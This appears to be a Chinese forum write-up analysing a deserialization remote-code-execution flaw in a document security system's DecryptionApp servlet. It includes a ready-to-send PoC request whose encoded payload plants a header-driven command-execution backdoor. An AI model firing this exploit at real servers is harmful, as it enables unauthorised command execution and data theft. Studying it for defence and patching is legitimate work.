![image-20240812161608658](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-f1d2241a4678c6dbaee950c372920c4efdfd4f1f.png)

接着就是到265-297代码的分析

![image-20240812163514010](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-dd692f03ca1d48656bd7afa01389b7203bd16f30.png)

**分析**：该部分的内容就是将模板名称、标志位以及之前的文件列表字符串设置到工作流对象flow对象中，接着就是进行sql数据库的连接以及调用`flowDao`的`addFlow`方法将`flow`对象添加到数据库。如果操作成功最后将我们的数据以XML的形式反应给前端

总结
--

该漏洞的形成利用了两个点

1. 在对前端输入的内容中，没有对文件的内容等方法方面进行相关的限制，导致可以上传任意的文件
2. Flow类中继承了`serialize`接口，我们在上传的参数中若存在序列化的内容即可利用它来进行反序列操作，进而造成相关数据的窃取

漏洞复现
----

**poc**

POST /CDGServer3/DecryptionApp?command=GETSYSTEMINFO HTTP/1.1

Host: your-ip

User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36

Accept-Encoding: gzip, deflate, br

Connection: close

Content-Type: text/xml

cmd: whoami

​

NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMI

![微信图片_20240812164526](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-aa1e68bf504d8d5023c38103ac21f66a8ac68e2e.png)

### poc的分析

相信大家在这里或多或少对这个poc不大理解，我们对该poc分析一下

我们使用工具对该poc进行解码操作，得到如下内容

![image-20240812164946571](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-74a26f6d90021b0377427586938d8d6546daed4f.png)

![image-20240812170153604](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-3c7d549d69f112d6dd302bfa420c88eed66932c8.png)

在`&lt;byte-array&gt;`发现了类似于base64编码的内容，我们对其进行解码操作，发现解码之后是一个.class文件

![微信图片_20240812165145](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a7581153f62ba64cc4372eb3684e8f9480776c61.png)

接着我们利用反编译工具对该.class文件进行反编译操作，得到如下内容

![image-20240812165405021](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-3087defa29affb13b68b300d95a487e2be753efc.png)

分析：该段代码它包含了一个后门，允许攻击者在请求头中发送一个cmd的参数，代码获取名为`cmd`的请求头的值，之后根据操作系统类型（Linux或Windows），`exec()`方法构造不同的命令执行格式。攻击者可以输入一些危险的指令进而获取到对方的一些敏感信息</textarea>
 <div id=layer-photos-demo>
 <div id=md_view><div class=markdown-body><h1 blockindex=0>某通电子文档安全管理系统DecryptionApp反序列化漏洞RCE</h1>
<p blockindex=1><strong>前情提要</strong>：某通是使用了servlet框架，一般都是先去web.xml寻找相关路由进而确定代码的位置</p>
<h2 blockindex=2>代码分析</h2>
<p blockindex=3>首先进入到WEB_INF的web.xml文件中，ctrl+F搜索<code>DecryptionApp</code></p>
<p blockindex=4><img src="data:image/png;base64,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
<p blockindex=5>ctrl点击进入到该这个<code>com.esafenet.workflow.servlet.DecryptionAppServlet</code>中,该类继承了<code>HttpServlet</code>类，那我们重点关注的就是前端交互的方法即<code>service</code>方法中，在该方法中有我们可以控制的参数<code>request</code></p>
<p blockindex=6><img src="data:image/png;base64,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
<p blockindex=7>现在就详细分析下这个<code>service</code>方法中的内容</p>
<p blockindex=8><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB6gAAAJ6CAIAAAAae4ttAAAgAElEQVR4nOzdd1gUxxsH8HfpcBy9ioAUe0VBAQW7gg0LNjRG7A3NzyT2xCRqbLEba6yxCxbEhmBBigKWKKgI0hHpvZf9/QGHd4hwpwcofj+Pjw+3N7fzzszu3t7s7CyTnZ1N3zAulxsaGkpE7du3b+xYAAAAAAAAAADqRUxMDBEZGho2diAAAA1EorEDAAAAAAAAAAAAAAAQJ3R8AwAAAAAAAAAAAECTgo5vAAAAAAAAAAAAAGhS0PENAAAAAAAAAAAAAE0KOr4BAAAAAAAAAAAAoElBxzcAAAAAAAAAAAAANCno+AYAAAAAAAAAAACAJgUd3wAAAAAAAAAAAADQpKDjGwAAAAAAAAAAAACaFHR8AwAAAAAAAAAAAECTgo5vAAAAAAAAAAAAAGhSvoKO79J3yVkHjlB5eWMHAgAAAAAAAAAAAABfgS+945vNz8/8+0Bh8JPss26NHQsAfFXyY31ObPrf337FjR0IAAAA1Kdiv7//t+mET1x+YwcCAPDtKozzv3Bs7+a1q48E5zV2LAAAPF90xzdbVp65/0hZUjIRFdy5n3/Xt7EjAvgMmcnrF98f8OMrv6zGjqTh5Uas37FvwA4vv9yGya8kwWvd8E7tB89cvfdRcsNkCQAAAI0l+dHe1TMHt+s8Yr13QkljBwPwZUm/v37CgAETN/plNHYkIC5fYJsWvz46qVvHfk5zFv+6duOll7gMCQBfjMbv+M4qKX+cWeKTWuyTWhyaXVrEN6NJ7lnX4pdhfC/dil+9boQQAcQh70H0Cp8s73sRex+UNnYsDS3vWcCKZ3Hez+7sfd4Aw6/L4i/MGzBiza0C8wUHvMN3OcjUf5YAAADQeGQcdoV7H1xgnu/5+/BBLpcTMEMiQJW82/tWnPX2PrNs722Mwm0ivsA2zb664Qe3N+qjd/i9Sc0tvPydZmMHBADA05gd3wVl7OW3hbvC866+LbyXXHQvuehCfMH217k+KcUsUf4dn2pDvNmysqz9h8uSUz4n05SUlJSUlFyelJQUDofD4XBSBEVHRyckJHxe+ZqS9FX2Vxj758FfbV631lxlut7dFSfWlYqI01Fnkp6Emp62Q0cpYdJ/CTGLC8e03SR1aTX1tg6m9d4LXR59bPbMf6O0hh+4e3Pzd9b6HL6jXMze3gwjO/c6f/rrc2UZpvfemGqrCV5lwjAmq2rdDoVJU6e8cPeNM+26GKhzudqmlqN/2HsvoVHmZsk46cgI6Ljh+Weustb6idnbmy8zSQUtY/Oh8/66GlXwmZl+IcSybTRhDVI/2N8/Dvs7ND0SHH3ryZtv3t0/TPPN0ZnzTsSxn7GyWs9F48Ktu17hrnn3Gev/Yn2rxyi6PpOpmePJL2c8bY2E+m7imI+Y1E5Nrd0UBwtOA8X16YJXmdTUEtXLWBB+ZcOMQV0MVBQUVAy6DJqx4Uq44FcK2rShJce9KSSpoVNndW3GEeq3LgBAQ6njoMSWZb0OeBjDGlhYt1aVZN4vzw73fRBVyDACiZVMbbq3kBdc+DHZpeyxqPzMkuoDMorL2XspRQkFZY5dOml06kBE+Te98u/6qi6cI6mrQ0QS8nLCrP9jCgoKqv7nl5dXw8VSPT29z8kLQICewYnLBo0dRCPR6nZiU7cGyanozo613nlqkw7tm9Lyyx/qXfJqj2PP+Tcy9azGTZypXRJ113XHvIsX/c77nXBs3sChyLYesXJlm4q/E27vOhrQEJnKmDv9PNiIiMoL08PvX9r787Cznjt8ryxsK9sQuQM0LOzv2N+h3sm0/H7ftjsdnc78scNnwl+9v/zzgC/Jt36MIuOhP0zsUq0TsVXrJnGEajH+ROj4xg5CSNrWs1euzCait7d3HQkgK2eXfs2ISMla+32a8ohD46